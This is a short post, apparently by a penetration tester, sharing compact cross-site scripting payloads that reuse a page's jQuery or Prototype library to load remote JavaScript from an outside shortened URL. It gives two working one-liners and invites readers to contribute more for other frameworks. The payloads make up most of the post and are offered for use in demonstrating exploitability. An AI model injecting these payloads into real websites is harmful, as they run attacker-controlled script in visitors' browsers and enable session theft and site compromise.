Lately there have been a lot of cases where I have needed a small way to bootstrap some remote JavaScript to demonstrate XSS exploitability to website stakeholders. Many sites are now using various popular JavaScript frameworks to assist with site functionality. These frameworks also work well for injection attacks and why not abuse what’s already loaded for your client side already?

Side Note: Limiting field length for input validation can mean the difference between a theoretical vulnerability and an exploitable vulnerability. (no alert(‘xss’) is not demonstration of exploitability)

JQuery: (33 characters)

$.getScript(‘http://tr.im/xXXx’);

Prototype: (70 characters)

$$(“head”)[0].insert(new Element(“script”,{src:’http://tr.im/xXXx’}));

I would like to continue to add to the collection if anybody has quick one-liners that I can add for other frameworks.